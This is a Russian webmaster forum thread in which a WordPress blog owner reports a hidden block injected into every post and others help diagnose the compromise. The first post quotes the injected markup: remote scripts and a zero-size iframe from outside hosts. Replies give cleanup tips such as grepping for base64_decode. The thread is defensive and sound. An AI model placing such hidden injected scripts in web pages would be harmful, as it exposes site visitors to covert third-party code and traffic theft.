X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Что-то странное с блогом wordpress, автоматически добавляется "что-то" к каждому посту в конце
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:31; Ответить: Stila
Сообщение #1


Участник
***

Группа: User
Сообщений: 193
Регистрация: 23.9.2011
Поблагодарили: 10 раз
Репутация:   1  


Здравствуйте

После каждого поста автоматически начал добавляться такой блок:

<script type="text/javascript" src="https://pluginplus.net/plugins/system/system_im.js"></script>
<iframe style="width: 0px; height: 0px; border: 0px none;" src="https://pluginplus.net/statistica/statistic_li.html"></iframe>
<script type="text/javascript" src="http://c.am15.net/preloader7.js"></script>
<div id="advm_video"></div>
<div>
<div id="advm_block" style="display: none;">
<div id="advm_close">Закрыть [Х]</div>
<div id="ambn17757"></div>
<div id="advm_box">
<div>Осталосьсек.</div>
</div>
</div>
</div>

Виден только в админке

Что это? unsure.gif
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 27.9.2013, 18:39; Ответить: paranormal
Сообщение #2


ПаранормалЪ
******

Группа: Super Moderator
Сообщений: 1068
Регистрация: 27.1.2011
Поблагодарили: 1943 раза
Репутация:   138  


Прямо в тело статьи добавляется?

(Stila @ 27.9.2013, 17:31) *
<div id="advm_block" style="display: none;">


Поэтому и не видно.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:46; Ответить: Stila
Сообщение #3


Участник
***

Группа: User
Сообщений: 193
Регистрация: 23.9.2011
Поблагодарили: 10 раз
Репутация:   1  


paranormal, да. Внизу sad.gif

его и не должно быть видно. Я даже не знаю что это)
Какие-то плагины для видео были активны- удалила. Все равно это появляется сразу после публикации
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 27.9.2013, 18:48; Ответить: paranormal
Сообщение #4


ПаранормалЪ
******

Группа: Super Moderator
Сообщений: 1068
Регистрация: 27.1.2011
Поблагодарили: 1943 раза
Репутация:   138  


Смените на время тему на стандартную и посмотрите, будет ли в новом посте или нет. Если нет, то значит надо искать бяку в файлах темы (single.php functions.php как правило).


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:50; Ответить: Stila
Сообщение #5


Участник
***

Группа: User
Сообщений: 193
Регистрация: 23.9.2011
Поблагодарили: 10 раз
Репутация:   1  


paranormal, Спасибо smile.gif Буду пробовать ночью, когда активность поменьше.
Надеюсь, что найдется

А что это за сайт pluginplus.net ?)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DeXtR
DeXtR
сообщение 27.9.2013, 19:08; Ответить: DeXtR
Сообщение #6


Новичок
*

Группа: User
Сообщений: 42
Регистрация: 23.3.2010
Поблагодарили: 10 раз
Репутация:   -1  


(Stila @ 27.9.2013, 17:50) *
pluginplus.net/plugins/system/system_im.js


Судя по
http://pluginplus.net/plugins/system/system_im.js и
http://jsc.dt00.net/k/i/kinodrug.net.42659.js

подключаются блоки маркетгида, затем на них сливается часть траффика, через какую-то уязвимость.
где-то на ачате недавно писали про этот метод sleep.gif


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 28.9.2013, 11:04; Ответить: Electric
Сообщение #7


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Проверяйте темы на наличия бяк. Возможно уже гдето запихнули шелл и через него вам исправили файлы движка.
Например поищите хотя бы base64_decode и str_rot13 в файлах.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 28.9.2013, 14:41; Ответить: Stila
Сообщение #8


Участник
***

Группа: User
Сообщений: 193
Регистрация: 23.9.2011
Поблагодарили: 10 раз
Репутация:   1  


Electric, что это? cry.gif Я обязательно поищу в гугле, но даже не знаю что в поиске набирать)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 28.9.2013, 14:54; Ответить: Electric
Сообщение #9


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


Stila, искать не в поисковие а по файлах сайта по фтп, указанные фразы...
Если сами е разберетесь - пишите в АСЬку, будем смотреть...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BRONX
BRONX
сообщение 28.9.2013, 16:03; Ответить: BRONX
Сообщение #10


Частый гость
**


Группа: User
Сообщений: 62
Регистрация: 26.8.2013
Поблагодарили: 13 раз
Репутация:   3  


(Electric @ 28.9.2013, 12:54) *
lectric, что это? Я обязательно поищу в гугле, но даже не знаю что в поиске набирать)))


Да и не мешало бы, все в том же ftp, посмотреть у каких файлов/директорий поменялась дата.
Самый верный способ узнать в какие файлы внесли вредоносный скрипт


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКто и что читает?
Любимые и не только, книги.
251 Levels 31022 Вчера, 16:47
автор: Catherine_Molli
Открытая тема (нет новых ответов) Карим Баратов признался, что имел отношение ко взлому компании Yahoo
4 MissContent 606 Вчера, 16:38
автор: wertu
Горячая тема (нет новых ответов) Что лучше, фриланс, удаленка, или работа в офисе солидной компании?
93 Levizar 7532 Вчера, 16:27
автор: Catherine_Molli
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
11 Nell 1051 Вчера, 15:21
автор: Nell
Открытая тема (нет новых ответов) Как включить автоматическое обновление для плагинов WordPress и самого движка?
0 Telnor 369 10.12.2017, 13:27
автор: Telnor


 



RSS Текстовая версия Сейчас: 12.12.2017, 3:28
Дизайн